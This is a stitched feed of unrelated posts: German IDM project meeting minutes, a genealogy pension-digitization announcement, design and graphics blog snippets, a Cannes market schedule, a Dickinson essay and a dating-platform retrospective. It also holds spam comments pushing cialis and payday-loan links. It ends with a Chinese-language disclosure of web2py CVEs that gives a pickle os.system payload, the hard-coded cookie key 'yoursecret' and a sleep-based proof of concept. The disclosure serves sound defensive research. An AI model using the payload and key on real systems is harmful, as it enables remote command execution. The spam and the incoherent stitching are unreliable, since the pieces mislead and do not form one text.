Die von Novell angestrebte exemplarische Implementierung in Erlangen und deren Abstrahierung, wirft die Frage nach der Verteilung des unternehmersichen Risikos auf. Wenn Novell erst im Nachhinein entscheidet welche Kosten nicht in Rechnung gestellt oder verrechnet werden, liegt dieses komplett beim RRZE, was aus Sicht der RRZE-Vertreter nicht tragbar ist.

Außerdem ist die Verallgemeinerung der Projektergebnisse mit einem gewissen Aufwand verbunden. Vor allem Herr Eggers hat bisher 9,75 Personentage für Koordination des Projektes Novell.IDM@Bayern investiert. D.h. diese Zeit wurde über das RRZE finanziert.

Die Skepsis der anderen Universitäten ggü. der Erlanger Lösung beruht auf negativen Erfahrungen anderer Universitäten mit Novell IDM sowie fehlender success stories für das Konzept der "vielen schlanken, verlinkten Objekte". Es wird ein Performance-Einbruch befürchtet.

Es wird erörtert vertrauenschaffende Lasttests mittels www.slamd.org durchzuführen. Wenn die Belastungstests durch Novell Consulting vorgenommen werden, stellt sich die Frage der Kostenübernahme für diese nicht projektrelevanten Arbeiten.

Herr Adam fragt daher nach dem Commitment von Wü, PA. Könnten die Belastungstests durch die anderen Universitäten übernommen werden? Außerdem macht er deutlich, dass im IDM Hardware einen wesentlichen Skalierungsfaktor darstellt!

Herr Adam könnte sich eine Refinanzierung durch eine deutschlandweite Lizensierung des Modells vorstellen.

Dies ist aus Sicht von Herrn Eggers politisch im ZKI von Seiten FAU nicht möglich, da die Zusammenarbeit im ZKI auf kostenfreien Erfahrungsaustausch basiert. Er schlägt daher eine Verrechnung über Novell vor. Dies stellt die von der FAU bevorzugte Lösung dar. Dies muss allerdings noch von Novell intern erörtert werden. Eine Rückmeldung wurde bis Mitte Mai erbeten.

Es wird daher beschlossen, die Entscheidung über eine Refinanzierung nach Bereitstellung Prototyp und Vorstellung ggü. Wü, PA zu vertagen. Im August sollte eine finale Entscheidung über Refinanzierung getroffen werden.

Als weitere Schritte seitens des RRZE wird eine Vorstellung der angestrebten Lösung vor allem ggü. PA, Wü vereinbart. Diese sollen um die Durchführung der Lasttests gebeten werden. Herr Dr. Hergenröder versucht bei seinen Kollegen ein entsprechendes Vertrauen herzustellen.

Dennoch stellt sich die Frage, welcher Vorteil aus der Lösung für Novell entsteht?

Für Herrn Adam ist ein gesteigertes Absatzvolumen (mehr Hochschulen) und die damit einhergehenden Skaleneffekte wesentlich. Es sollten daher weitere Hochschulen identifiziert werden (HH?). Dabei ist die Übertragbarkeit der Lösung ein wesentlicher Faktor für einen ROI.

Herr Eggers wird gebeten ein Produktkonzept in Grobstruktur zu entwickeln.

Er wird die Zurverfügungstellung des aktuellen Standes des Novell.IDM@Bayern Konzepts prüfen.

Herr Adam bitte darum in kurzer Form die wiederverwendbare Komponenten, potentielle weitere Kunden sowie das bevorzugte Verrechnungsmodell (Übernahme von Consulting-Tagen) zu erläutern.

Exkurs: Novell stellt sowohl einen freeRADIUS als auch ein MIT Kerberos mit Erweiterung für UniversalPasswort bereit. Herr Dr. Rygus wird gebeten Herr Tröger über die Möglichkeiten zu informieren.

2. Status Projekt

Herr Lippert und Herr Eggers berichten vom Feinkonzept Workshop (12. - 14.03.) und erläutern den daraus entstandenen Projektplan. Es wurden Detail- und Verständnisfragen erörtert.

Herr Eggers stellt die Aufwandsschätzung für das IDM-Service-Portal vor und kann berichten, dass dieses wohl gänzlich mit der User Application realisiert werden kann. Grundlage für die Entwicklung werden die von Herrn Tröger umfassend aufbereiteten Use Cases bilden. Vom 14. - 16.05. wird es eine interne Schulung für die Projekt MA sowie 2 neue HiWis geben, um in die Feinheiten des Customizing eingeführt zu werden.

Herr Eggers berichtet kurz von dem positiven Feedback auf die IFB IDMone (rtsp://ard.rrze.uni-erlangen.de/movies/rrze/20070403-Eggers.smil), weist auf den Artikel in der aktuellen BI 77 auf Seite 3 hin.

Er erläutert kurz die Zielsetzung der AG IDMone, die erstmals am 08.05. zusammen treffen wird und weist auf erste Erfolge im WebSSO hin.

Und die Projekt-Webseite ist in englischer Sprache verfügbar http://www.rrze.uni-erlangen.de/forschung/laufende-projekte/idm_en.shtml. Die Übersetzung des "Projekt-Verantwortlichen" als "project guarantor" wird in Zweifel gezogen. Daher wollen die Lenkungsausschussmitglieder dies nochmal individuell prüfen.

3. Risiko Management - Review der Top Risiken / offene Punkte

Herr Eggers benennt und erläutert knapp die folgenden Punkte:

a) Kategorie Blocker:

Personelle Ausstattung (Zielkonflikt Ablösung vs. Umfang)

Konsensverfahren

Abbildung der Organisationsstruktur

b) Kategorie Critical:

Ablösung der bisherigen Benutzerverwaltung bis 2007

Barriefreie Weboberfläche Novell Front-End

DIT-Struktur

Anbindung RRZE-Abrechnung

4. Ausblick bis nächster Termin / Nächster Termin

Im Ausblick ist festzuhalten, dass der 16.07.2007 als Meilenstein für ein nach derzeitiger Umfangsplanung vollständiges Pilotsystem genannt werden kann. Detailliertere Angaben zu Terminen sind derzeit seriös nicht möglich.

Am 09.05. wird der BRZL AK MetaDir in Erlangen tagen und IDMone ausführlich vorgestellt.

Der Senatskommission für Rechneranlagen (SEKORA) wird IDMone am 11.05. präsentiert.

Wie oben bereits erwähnt findet vom 14. bis 16.05. eine Schulung zum UserApp Customizing für alle IDMone MA sowie 2 HiWis statt.

Das Testsystem (vor allem UserApp) muss bis Mai stehen, damit der vom Kanzler geplante Entscheidungs-WS statt finden kann. *Aktuelle Ergänzung*: Dies erscheint derzeit zweifelhaft, da ein Termin der evtl. der Vorbesprechung dienen könnte, kurzfristig auf den 12.06. verlegt wurde.

Außerdem ist das Testsystem die Vorraussetzung, damit die Kollegen aus PA und WÜ erste Praxistests sehen können, evtl. Lasttests vornehmen und Novell.IDM@Bayern sich konkretisieren kann.

Die Projekt-Urlaubsphase erstreckt sich vom 17.05. bis 08.06. in dieser Zeit wird es voraussichtlich auch keine Wochenberichte geben.

Der Lenkungsausschuss tagt wieder am 04.07.2007 15 - 17 Uhr.

5.Verschiedenes

- Herr Adam bittet um die Versendung der Tagesordnung einen Tag vor der Lenkungsausschusssitzung.


          Document Conservation Resumes for War of 1812 Pension Files        





Message from the President


Today, the Federation of Genealogical Societies (FGS) announced the resumption of conservation of the War of 1812 Pension Files.

The Federation of Genealogical Societies (FGS) is pleased to announce National Archives staff have recently resumed document conservation of the War of 1812 Pension files covering surnames M(Moore)-Q. Document conservation is the essential first step in digitizing these files. Our digitization partner, Ancestry.com, has scheduled image capture of these newly conserved documents to begin the second week of September 2017. As capture resumes, new images will be added to Fold3.com on a rolling basis. The Federation and the dedicated volunteers of the Preserve the Pensions project have worked tirelessly for well over a year to negotiate a resolution to the work stoppage. This portion of the project plan is expected to be completed by third quarter 2018.
Many in our community have expressed frustration with the lack of new information on the status of the Preserve the Pensions project, ongoing negotiations and the safety of donated funds. As incoming President, I had an obligation to hold any response to those concerns until I could evaluate the history, speak candidly with the Preserve the Pensions team and meet with our partners. From the outside, and with perfect hindsight, it is easy to see a few opportunities missed to share more with you, our supporters. I stand behind the Preserve the Pensions team even so. They have worked incredibly hard to bring this unprecedented fundraising and preservation effort this far.

As frustrating as it may be to hear, FGS is limited in how much it can share with the community at large regarding ongoing negotiations with partners. As an organization, we most certainly may not reveal the internal discussions between our partners. That simple fact of business leaves you, our funding supporters, at times without satisfactory answers to your questions. While I will do everything in my power as FGS President to keep you apprised going forward, I will likely never satisfy your questions completely. With that in mind, and with the current project plan in place, I am able to share with you a very brief outline of events.

A security incident at the National Archives and Records Administration (NARA) facility in St. Louis led to a work stoppage of digitization projects for security review. This incident was unrelated to the Preserve the Pensions project in Washington D.C., however, our project was impacted.  The Federal bureaucracy is a slow-moving beast, as many of us have experienced outside of genealogy.   The completed review led to new security and project protocols. These protocols imposed new cost, space, and completion date constraints on the project. Neither conservation nor digitization could resume without a renegotiated project plan. These negotiations were difficult and time-consuming as each partner fought for their organization’s priorities. Ultimately, each partner compromised where they could to bring this important preservation project back online. The negotiations, however, are not over. The project plan above is a test of both the new project protocols and the compromises each of us made. It is a proof of concept. As this new project plan is put into practice, NARA, Ancestry.com, and FGS will continue to work together to evaluate the process with an eye towards negotiating the project plan for the final phase of conservation and digitization of surnames R-Z.

I can assure you, the funds you have so generously contributed to this effort are secure. In accordance with Generally Accepted Accounting Principles (GAAP), funds donated for a specific purpose must be separate from general operating funds. Your donations were deposited into a restricted fund. Any monies FGS provided for matching campaigns were moved from our operating capital into this restricted fund. Digitization and other project expenses were spent from the restricted fund.

While the total value of the project was originally projected to be $3.456 million, FGS was responsible for raising only half that amount - $1.728 million - due to the very generous match by Ancestry.com. This valuation was based on a projected 7.2 million pages in the War of 1812 Pensions collection at a total cost of $0.48 per page image. The new project plan has added to the total cost of the Preserve the Pensions project.  However, the number of images for the first half of the collection was less than originally expected.  We anticipate this trend will continue in the second half of the collection. Therefore, FGS stands by its decision to close community fundraising for the project.

On behalf of the board of the Federation and the dedicated volunteers of the Preserve the Pensions team, I have heard and acknowledge your concerns. Your support of this project has been both overwhelming and inspirational. As a first of its kind effort to crowdfund preservation of a genealogically-valuable collection, there was no roadmap. The Preserve the Pensions team is dedicated to seeing this project through until the very last page of the very last pension is online. We will evaluate the successes and shortcomings of the project as implemented before proceeding to a new project. In the meantime, we will work to regain your trust by being as forthcoming as the realities of these sensitive negotiations will allow.

FGS remains grateful to the community for your contributions; this project would not have been successful without the energy of all of you behind us. I welcome your questions or concerns at president@fgs.org.

--Rorey Cathcart, FGS President

          MANITOBA        

Manitoba has given me so much, Its where I grew up, its where I met my beautiful wife, and its where my amazing children have been born. This is a proof of concept for an up and coming personal project I have been toying with. Likes: 87 Viewed: 2692 source

Het bericht MANITOBA verscheen eerst op Motion Graphics.


          Practice, production and the quest for innovation        
The means to produce are changing. The chimneys stopped smoking during the course of the past century and are being replaced by an increasingly distributed production line. Production is coming to a desk near you.

These new ways of producing, such as 3d printing, whilst in some branches of technology already being employed in mass production, are being explored extensively by the creative industries. Not so much as a a tool of mass production but rather as a rapid prototyping tool to explore options and simulate proof of concept.

Third Thumb Dani ClodeImage taken from formLabs by Dani Clode. / From Fixing Disability to Extending Ability.

A mesmerizing project was recently developed by design student Dani Clode at Royal College of Art for her final year project. She had already worked in reference to the body in earlier projects and also experimented with other ideas centring around prosthetics.

This third thumb project is exploring the relationship between body function, mechanics and perception. Clode states about her project: It is part tool, part experience, and part self-expression. She has in fact based the project not on the idea of fixing, but rather the interpretation of the word prosthetic as extending.

The Third Thumb functions via sensors on the shoe of the wearer to control the movement of the 3d printed sixth finger, or third thumb.

COFFEE TABLE Dani ClodeImage taken from DANI AT RCA by Dani Clode. / MY COFFEE TABLE CURRENTLY, November 21, 2016.

WORK-IN-PROGRESS Dani ClodeImage taken from DANI AT RCA by Dani Clode. / WORK-IN-PROGRESS, January 20, 2017.

It references a growing body of work that is exploring the human body such as for example Instrumented Bodies by Joseph Malloch and Ian Hattwick with Les Gestes

Objects and extensions in this dialogue are not reduced to mere fashion accessories, but are placed in a discourse that ranges from cyborgs to self image. Couldn't be more suitable for our times.

Video taken from Vimeo by Dani Clode. / Promotion clip for imaginary KickStarter campaing.
          Data aware jit/blit - drawing 1.25 to 1.45 times faster.        
Drawing different types of pixels can be quicker if you know about the image you are drawing, and if you know that drawing parts of the image with specialised blitters is quicker.

A good example is if your image is 25% areas of large blocks of either white or black. Using a specialised fill routine to just draw those big blocks of color is lots quicker. This is because there is usually an optimised, and hardware accelerated fill routine.

See all this whitespace? (all the white parts on your screen) These can be drawn really quickly with ASIC fill hardware rather than a slow GPU running a general purpose image blitter.

Another example is like this Alien image. The edges of the image are transparent, but the middle has no transparency. Since drawing transparent images is slow, using a different drawing routine for the middle part than the edges turns out to be faster.

Alien graphic used in Pygame Zero teaching framework documentation.
 
Here is a proof of concept which draws an image used by pygame zero in 80% of the time it normally takes. That is about 1.25 times quicker.
https://github.com/illume/dataaware

Alien sectioned up, drawn with 5 different blitters, each perfect for the section.

The results vary dramatically depending on the image itself. But the 1.25 times faster is fairly representative of transparent images where the middle part isn't. If it finds sections where the image is a plain colour, that can be 1.42 times faster. Or more. Larger images give you different results as does different hardware. Obviously a platform with a fast path hardware accelerated image fills, or 16 bit image rendering but slow 32bit alpha transparency is going to get a lot bigger speedups with this technique.

Further work is to develop a range of image classifiers for common situations like this, which return custom blitters depending on the image data, and the hardware which it is running on.

(this is one of several techniques I'm working on for drawing things more quickly on slow computers)

          Comment on Precision Medical Devices, Inc. (PMD) Completes The Main Body Of Its “Proof Of Concept” Animal Implant Tests Of Its Revolutionary Remotely- Controlled And Remotely Adjustable Bionic Urinary Sphincter Device Designed To Treat Severe Urinary Incontinence by anaedge        
buy cialis online without a health [url=http://buymcialisonlinerx.com]cheap cialis online[/url] cialis tablets for sale <a href="http://buymcialisonlinerx.com|cialisnrx.com|buysviagrarxonline.com" rel="nofollow">buy cialis online</a>
          Comment on Precision Medical Devices, Inc. (PMD) Completes The Main Body Of Its “Proof Of Concept” Animal Implant Tests Of Its Revolutionary Remotely- Controlled And Remotely Adjustable Bionic Urinary Sphincter Device Designed To Treat Severe Urinary Incontinence by Wheedge        
need cash [url=http://personalloansesonline.com/ ]payday loans[/url] online loan <a href="http://personalloansesonline.com/" rel="nofollow">payday loans online</a>
          Day 4 in the Market        

header-img-new.jpg

May 20th 2017

 

After an immensely successful first three days of the Marché du Film, day four will surely go off with a bang!

 

Note in your calendar: our newest program, Frontières, will kick off tomorrow morning at 10:00 with proof of concept presentations! And don't forget that you have two days left to experience VR at NEXT.  

 

Running around all day? Stop by the Relaxation Booth (Palais -1, 21-04) to get a massage. Book your appointment now via sms at +33 6 81 69 33 02 or by email at shiatsu06@free.fr.

 

For more information on the events, programs and conferences, take a look at our complete Marché event schedule.

 

 

Last minute screening changes

 

New screenings:

- Palais G - 9:30 - ABSINTHE

- Palais B - 13:30 - TRAGEDY GIRLS

- Palais B - 17:30 - ON WINDS OF EAGLES

- Palais C - 20:30 - TEMPORTALISTS. THE TREASURE OF FATIMA

- Palais E - 20:30 - THE BLACK PRINCE

- Debussy - 16:45 - UNFORGIVEN

- Gray 3 - 10:00 - FREAK SHOW

- Arcades 2 - 16:00 - ISMAEL'S GHOST

- Olympia 5 - 20:30 - BROTHERS IN HEAVEN

- Olympia 6 - 20:00 - BAAHUBALI - THE BEGINNING

- Olympia 7 - 20:00 - EVERYONE'S LIFE

 

Canceled screenings:

- Debussy - 17:00 - LECON DE CINEMA - CLINT EASTWOOD

 

Modifications:

- Debussy - 11:15 - WALKING PAST THR FUTURE changed to: 11:30

- Debussy - 15:30 - APRIL'S DAUGHTERS changed to: 14:15

- Lerins 3 - 16:00 - MONTPARNASSE BIENVENUE - access: market badges changed to: access: priority badges only

- Doc Corner - 9:00 - POMEGRANATES IN LAHORE - length: 12 changed to: length: 110 (trailer in a loop)

- Olympia 1 - 20:15 - BPM - access: market badges changed to: access: market and festival badges (no priority access)

Olympia 1 - 23:00 - THE SQUARE - access: market badges changed to: access: no priority access

 

 

Events you won't want to miss

 

NEXT:

Conference: - Monetization of VR Content presented by Digital Film Cloud Network, 16:00 - 18:00, NEXT Conference Room (Palais des Festivals, Level -1, Aisle 14)

- 50/50 by 2020 Global Reach presented by Swedish Film Institute, 14:00 - 16:00, Palais K (Level 4, Palais des Festivals)

Market screening: Canada. Big on VR presented by Téléfilm Canada, 10:00 - 11:00, NEXT VR Theater (Palais des Festivals, Level -1, Aisle 14)

 

Doc Corner:

In the Doc Room: - Waynak (Where are you?): How to disrupt the media narrative while creating social impact?, 11:30 - 13:30, Doc Corner Screening Room (Riviera H8)

Doc Talks: - Future Distribution Models hosted by the European Documentary Network, 17:30 - 18:30, Doc Corner Screening Room (Riviera H8)

 

Goes to Cannes:

Presentation: - HAF: Hong Kong Goes to Cannes, 16:00 - 18:00, Palais K (Level 4, Palais des Festivals)

 

Frontières:

Presentation: Proof of Concept, 10:00 - 12:00, Palais K (Level 4, Palais des Festivals)

 
 

          "Much madness is divinest sense" by Emily Dickinson        
Much madness is divinest sense
To a discerning eye,
Much sense, the starkest madness.
'Tis the majority
In this, as all, prevail:
Assent, and you are sane;
Demur, you're straightway dangerous
And handled with a chain.


I was struck first with just how accurate this poem is. History has many instances of when this idea of "majority rules" has defined madness whether ruling that the earth is flat or more serious issues involving race or religion. I particularly like the last two lines, "Demur, you're straightway dangerous/ And handled with a chain." The imagery is particularly vivid and clearly articulates just how little we, the human race, hate to be disagreed with.

Dickson has managed to more than simply frame a universal truth; the very way she uses her words is beautiful. Just the first line, "Much madness is the divinest sense," slides off the tongue beautifully, helped especially by repetition of the "s" sound at the end of most the words. She continues the pattern in the third line, "Much sense, the starkest madness." The similar sounds connect the first and third line along with the similar sentence structure. They are different most the poem in other ways, too. The whole poem is written in iambic meter. Most of it has three feet per line, but the first, third (and also seventh) lines have four. This, the "thesis" of the poem, is set then set apart. The seventh line, written with four feet and repeating the "s" sound with "straightaway dangerous," connects back to the beginning. It also functions a little like the second line, which, having only three feet and no "s" ending, surprises the reader, breaking the stereotypical flow of poems. The seventh line, set between two tetrameter, rhyming lines, also provide that jerking contrast. The entire poem functions in a similar way: the first three lines work like a stand-alone poem, and the last do the same, in the same structure and patter, but the middle to trip up the tongue, repeating not the "s" sound the "a" of majority, all, as, and prevail. The result is a poem that feels like is should flow, but that purposely does not.

Why would Dickinson want her poem to feel uncomfortable? Because she talking about madness and dissent! Her very poem is a proof of concept. The message is "divinest sense," but the structure is strange enough to make some question her writing abilities. She is breaking away from conventional poetry which either focus on a specific structure or is complete free-verse. She has a structure; it just isn't one that her readers are used to or comfortable with. This "sense" is as discontenting as "madness" goes against regular poetry. And the reader feels it and wants to chain it up in a specific, usual structure. It feels uncomfortable and sometimes difficult to read.

And yet, Dickinson's poem is powerful. Once one has come to understand its structure, saying the first three lines is pleasing, even fun. And there is something powerful in the last, and only, rhyme between "sane" and "chain." It ends to poem with such solid sound that the prior discomfort is immediately forgotten. "Assent, and you are sane;/ Demur, you're straightway dangerous/ And handled with a chain." Dickinson could make anything sound profound with such talent.
          Getting Started        

I've been involved with World Singles for about five years now, about three and a half years as a full-time engineer. The project was a green field rewrite of a dating system the company had evolved over about a decade that, back in 2009, was running on ColdFusion 8 on Windows, and using SQL Server. The new platform soft-launched in late 2011 as we migrated a few small sites across and our full launch - migrating millions of members in the process - was May 2012. At that point we switched from "build" mode to "operations" mode, and today we maintain a large codebase that is a combination of CFML and Clojure, running on Railo 4.2 on Linux, and using MySQL and MongoDB, running partly in our East Coast data center and partly on Amazon.

Like all projects, it's had some ups and downs, but overall it's been great: I love my team, we love working with Clojure, and we have a steady stream of interesting problems to solve, working with a large user base, on a multi-tenant, multi-lingual platform that generates millions of records of data every day. It's a lot of fun. And we all get to work from home.

Sometimes it's very enlightening to look back at the beginning of a project to see how things got set up and how we started down the path that led to where we are today. In this post, I'm going to talk about the first ten tickets we created as we kicked the project off. Eleven if you include ticket "zero".

  • #0 - Choose a bug tracking / ticketing system. We chose Unfuddle. It's clean and simple. It's easy to use. It provides Git (and SVN) hosting. It provides notebooks (wikis), ticketing, time management, customizable "agile" task boards, collaboration with external users, and it's pleasing to the eye. I've never regreted our choice of Unfuddle (even when they did a massive overhaul of the UI and it took us a week or so to get used to the radically new ticket editing workflow!).
  • #1 - Version control. Yes, really, this was our first ticket in Unfuddle. The resolution to this ticket says:
    Selected vcs system (git), created repository in Unfuddle, and provided detailed documentation on why git, how to set it up, how to connect to the repo and how to work with git.
    And the documentation was all there in an Unfuddle notebook for the whole team. A good first step.
  • #2 - Developer image. Once we had version control setup and documented, we needed an easy way for every developer to have a full, self-contained local development environment. We had some developers on Windows, some on OS X, some on Linux, so we created a VMWare image with all the basic development tools, a database, a standardized ColdFusion installation, with Apache properly configured etc. This established a basic working practice for everyone on the team: develop and test everything locally, commit to Git, push to Unfuddle. We could then pull the latest code down to a showcase / QA server for the business team to review, whenever we or they wanted.
  • #3 - Project management system. Although we had bug tracking and wikis, we wanted to nail down how communication would work in practice. We created a project management mailing list for discussion threads. We created a notebook section in Unfuddle for documenting decisions and requirements. We decided to use Basecamp for more free-form evolution of business ideas. We agreed to use tickets in Unfuddle for all actionable work, and we settled on a Scrum-like process for day-to-day development, with short, regular sprints so we could get fast feedback from the business team, and they could easily see what progress we were making.
  • #4 - General project management. Since we had agreed to use Unfuddle for time tracking, we created a ticket against which to track project management hours that didn't fit into any actual work tickets. We used this for the first six months of the project (and logged about 300 hours against it).
  • #5 - Performance planning/tuning. This was mostly a placeholder (and initially focused on how to make a Reactor-based application perform better!). It was superceded by several more specific tickets, six months into the project. But it's one of those things we wanted on the radar early for tracking purposes.
  • #6 - Architectural planning. Like ticket #4, this was a time tracking bucket that we used for the first six months of the project.
  • #7 - Set up Continuous Integration. Yup, even before we got to our first actual coding ticket, as part of the early project setup, we wanted a Continuous Integration server. Whilst we were using ColdFusion for local development (prerelease builds of ACF9, at the time), we chose to use Railo 3.2 for the CI server so that we could ensure our code was cross-platform - we were still evaluating which engine to ultimately go to production with. The resolution of this ticket says:
    Apache / Tomcat / Railo / MySQL / Transparensee / Hudson in place. Automated test run restarts Railo, reloads the DB, reloads Transparensee, cleans the Reactor project, runs all test suites and generates test results.
    We developed an Ant script that stopped and started Railo, tore down and rebuilt the test database, using a canned dataset we created (with 1,000 random users), repopulated the search engine we use and cleaned up generated files, then ran our fledgling MXUnit test suite (and later our fledgling Selenium test suite).
  • #8 - Display About us/trust. This was our first actual code ticket. The company had selected ColdBox, ColdSpring, and Reactor as our basic frameworks (yeah, no ticket for that, it was a choice that essentially predated the project "getting started"). This ticket was to produce a first working skeleton of the application that could actually display dynamically generated pages of content from the database. We created the skeleton of the site navigation and handlers for each section as part of this ticket. The "trust" in the ticket title was about showing that we really could produce basic multilingual content dynamically and show an application architecture that worked for the business.
  • #9 - Implement resource bundles for templates. And this was also an early key requirement: so that we could support Internationalization from day one and perform Localization of each site's content easily.
  • #10 - Display appropriate template for each site. This was our other key requirement: the ability to easily skin each site differently. Like #9, this was an important proof of concept to show we could support multiple sites, in multiple languages, on a single codebase, with easy customization of page layouts, content, and even forms / questions we asked.

So that's how we got started. Bug tracking, version control, local development environment, continuous integration and the key concepts tackled first!

A reasonable question is to ask what has changed in our approach over the five years since. We're still using Unfuddle (in case you're wondering, we're up to ticket 6537 as I write this!), we're still using Git (and still loving it). Our development stack has changed, as has some of our technology.

Over time we all migrated to Macs for development so maintaining the VM image stopped being important: everyone could have the entire development stack locally. We eventually settled on Railo instead of ColdFusion (we're on Railo 4.2 now), and we added MongoDB to MySQL a couple of years ago. We added some Scala code in 2010 to tackle a problematic long-running process (that did a lot of XML transformation and publishing). We added Clojure code in 2011 for a few key processes and then replaced Scala with Clojure and today Clojure is our primary language for all new development, often running inside Railo. We stopped using Reactor (we wrote a data mapper in Clojure that is very close to the "metal" of JDBC). Recently we stopped using MXUnit and replaced it with TestBox. We're slowing changing over from Selenium RC tests to WebDriver (powered by Clojure). We have about 20,000 lines of Clojure now and our CFML code base is holding steady at around 39,000 lines of Model and Controller CFCs and 45,000 lines of View cfm files.


          WEB2PY 反序列化的安全問題-CVE-2016-3957        

前言

在一次滲透測試的過程中,我們遇到了用 web2py 框架建構的應用程式。為了成功滲透目標,我們研究了 web2py,發現該框架範例應用程式中存在三個資訊洩漏問題,這些洩漏都會導致遠端命令執行 (RCE)。由於範例應用程式預設是開啟的,若沒有手動關閉,攻擊者可以直接利用洩漏資訊取得系統執行權限。這些問題編號分別為:CVE-2016-3952、CVE-2016-3953、CVE-2016-3954、CVE-2016-3957。

背景-老生常談的 Pickle Code Execution

在繼續說明前必須要先認知什麼是反序列化的安全問題?反序列化的安全問題在本質上其實是物件注入,它的嚴重性取決於所注入的物件本身是否會造成危險行為,例如讀寫檔。一般來說要透過反序列化建構一個成功的攻擊有兩個要點:

  • 是否可控制目標所要反序列化的字串。
  • 危險行為在反序列化後是否會被執行。這在實務上大概有下面兩種情形:
    • 危險行為是寫在魔法方法 (Magic Method) 裡面,例如 PHP 的 __construct 在物件生成時一定會執行。
    • 反序列化後覆蓋既有物件,導致正常程式流程出現危險結果。

反序列化的問題在每個程式語言都會發生,但通常需要搭配看程式碼拼湊出可以用的攻擊流程,比較難利用。不過,某些實作序列化的函式庫會將程式邏輯也序列化成字串,因此攻擊者可以自定義物件直接使用,不再需要拼湊,例如今天要提的 Python Pickle。

直接舉個 Pickle 的例子如下,我們製造了一個會執行系統指令 echo success 的物件 Malicious,並且序列化成字串 "cposix\nsystem\np1\n(S'echo success'\np2\ntp3\nRp4\n."。當受害者反序列化這個字串,即觸發執行該系統指令,因此印出 success。

>>> import os
>>> import cPickle
>>> class Malicious(object):
...   def __reduce__(self):
...     return (os.system,("echo success",))
...
>>> serialize = cPickle.dumps(Malicious())
>>> serialize
"cposix\nsystem\np1\n(S'echo success'\np2\ntp3\nRp4\n."
>>> cPickle.loads(serialize)
success
0

這就是 Pickle 誤用反序列化所造成的命令執行風險。攻擊者很容易可以產生一個含有任意命令執行的序列化字串,進而讓受害者在進行反序列化的過程中觸發執行惡意命令。

反序列化 + 序列化字串可控

本次發現的問題主要來自 web2py 本身的 session cookie 使用 Pickle 處理序列化需求 (CVE-2016-3957),而且因為 session cookie 的加密字串固定 (CVE-2016-3953),攻擊者可任意偽造惡意的序列化字串造成前面所介紹的命令執行風險。細節如下。

CVE-2016-39571

web2py 的應用程式如果使用 cookie 來儲存 session 資訊,那麼在每次接到使用者請求時會將 session cookie 用一個 secure_loads 函式將 cookie 內容讀入。 [Ref]

gluon/globals.py#L846
if response.session_storage_type == 'cookie':
            # check if there is session data in cookies
            if response.session_data_name in cookies:
                session_cookie_data = cookies[response.session_data_name].value
            else:
                session_cookie_data = None
            if session_cookie_data:
                data = secure_loads(session_cookie_data, cookie_key,
                                    compression_level=compression_level)
                if data:
                    self.update(data)
            response.session_id = True

secure_loads 函式內容如下,在一連串解密後會用 pickle.loads 方法將解密內容反序列化,在這裡確定 cookie 內容會使用 Pickle 處理。[Ref]

gluon/utils.py#L200
def secure_loads(data, encryption_key, hash_key=None, compression_level=None):
    if ':' not in data:
        return None
    if not hash_key:
        hash_key = sha1(encryption_key).hexdigest()
    signature, encrypted_data = data.split(':', 1)
    actual_signature = hmac.new(hash_key, encrypted_data).hexdigest()
    if not compare(signature, actual_signature):
        return None
    key = pad(encryption_key[:32])
    encrypted_data = base64.urlsafe_b64decode(encrypted_data)
    IV, encrypted_data = encrypted_data[:16], encrypted_data[16:]
    cipher, _ = AES_new(key, IV=IV)
    try:
        data = cipher.decrypt(encrypted_data)
        data = data.rstrip(' ')
        if compression_level:
            data = zlib.decompress(data)
        return pickle.loads(data)  # <-- Bingo!!!
    except Exception, e:
        return None

因此,如果知道連線中用以加密 cookie 內容的 encryption_key,攻擊者就可以偽造 session cookie,進而利用 pickle.loads 進行遠端命令執行。

CVE-2016-3953

很幸運的,我們發現 web2py 預設開啟的範例應用程式是使用 session cookie,並且有一個寫死的密鑰:yoursecret。[Ref]

applications/examples/models/session.py
session.connect(request,response,cookie_key='yoursecret')

因此,web2py 的使用者如果沒有手動關閉範例應用程式,攻擊者就可以直接在 http://[target]/examples/ 頁面發動攻擊取得主機操作權。

Proof of Concept

我們嘗試用 yoursecret 作為 encryption_key 偽造一個合法的 session cookie,並將一個會執行系統指令 sleep 的物件塞入其中。帶著此 session cookie 連入 web2py 官網範例應用程式(http://www.web2py.com/examples),情形如下:

當插入的物件會執行指令 sleep 3 時,網站回應時間為 6.8 秒

POC1

當插入的物件會執行指令 sleep 5 時,網站回應時間為 10.8 秒

POC2

確實會因為塞入的 session cookie 值不同而有所延遲,證明網站的確執行了(兩次)我們偽造的物件內容。2

其他洩漏導致 RCE

此外,在 web2py 範例應用程式為了示範框架的特性,因此洩漏了許多環境變數。其中有兩個變數較為敏感,間接也會導致端命令執行,分別如下。

CVE-2016-3954

在 http://[target]/examples/simple_examples/status 頁面中,response 分頁內容洩漏了 session_cookie_key 值。這個值就是用來加密前面所介紹的 session cookie,搭配 CVE-2016-3957 Pickle 的問題可直接遠端命令執行。

CVE-2016-3954

無論使用者是否自行更改 session_cookie_key,或是該值是系統隨機產生。此介面仍然可以取得機敏資訊藉以造成危害。

CVE-2016-3952

http://[target]/examples/template_examples/beautify 頁面洩漏了系統環境變數,當使用者是使用 standalone 版本時,管理者的密碼就會在環境變數裡出現。這個密碼可登入 http://[target]/admin 管理介面,管理介面內提供方便的功能得以執行任意指令。

CVE-2016-3952

官方修復

Version 2.14.1 移除洩漏的環境變數。[Ref]

Version 2.14.2 使用不固定字串作為 session_cookie_key,並移除洩漏頁面。

applications/examples/models/session.py
from gluon.utils import web2py_uuid
cookie_key = cache.ram('cookie_key',lambda: web2py_uuid(),None)
session.connect(request,response,cookie_key=cookie_key)

總結

web2py 框架預設會開啟一個範例應用程式,路徑為 http://[target]/examples/。
由於這個應用程式使用 Pickle 來處理序列化的 session cookie,且因為加密字串為寫死的 yoursecret,任何人可竄改 session cookie 的內容,藉此進行 Pickle 命令執行攻擊。
該範例程式介面中也存在 session_cookie_key、管理者密碼洩漏問題,兩個都會導致任意命令執行。除此之外,在這個應用程式中洩漏許多系統配置、路徑等資訊,有機會被拿來做進階攻擊。
在 2.14.2 版本後已經修復所有洩漏問題,當然最好的解決辦法就是關閉這個範例應用程式。

最後,來整理從開發者的角度在這個案例中該注意的要點:

  1. 小心處理序列化字串,使用者若有機會改變該字串值,有機會被插入未預期的惡意物件,造成惡意的結果。
  2. 正式產品中切記要移除任何跟開發相關的配置。

時間軸

  • 2016/03/08 發現問題與其他研究
  • 2016/03/09 回報官方 GitHub Issue
  • 2016/03/15 成功與開發者 email 聯繫
  • 2016/03/15 官方修復管理者密碼洩漏問題 (CVE-2016-3952)
  • 2016/03/25 官方修復其他弱點並發佈 2.14.2 版本

附註

